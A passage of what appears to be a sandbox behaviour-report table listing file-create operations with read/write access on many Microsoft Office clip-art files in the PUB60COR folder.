| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00241_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00334_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00443_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00513_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00527_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00546_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00623_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00625_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00681_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00687_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00688_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01058_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01080_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01329_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01461_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01759_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01923_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02155_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02282_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02298_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02312_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00005_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00114_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00046_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00177_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00233_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00346_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00351_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00557_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00919_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00956_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\INDST_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0075478.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086384.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086420.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086424.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086426.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086428.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086432.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086478.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089945.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090027.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090089.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090149.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090390.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090779.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090783.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0093905.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0098497.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099149.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099151.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099158.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099159.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099169.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099170.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099173.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099174.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099175.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099176.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099177.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099178.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099179.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099180.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099182.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099192.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099194.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099195.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099196.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099198.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099199.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099200.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
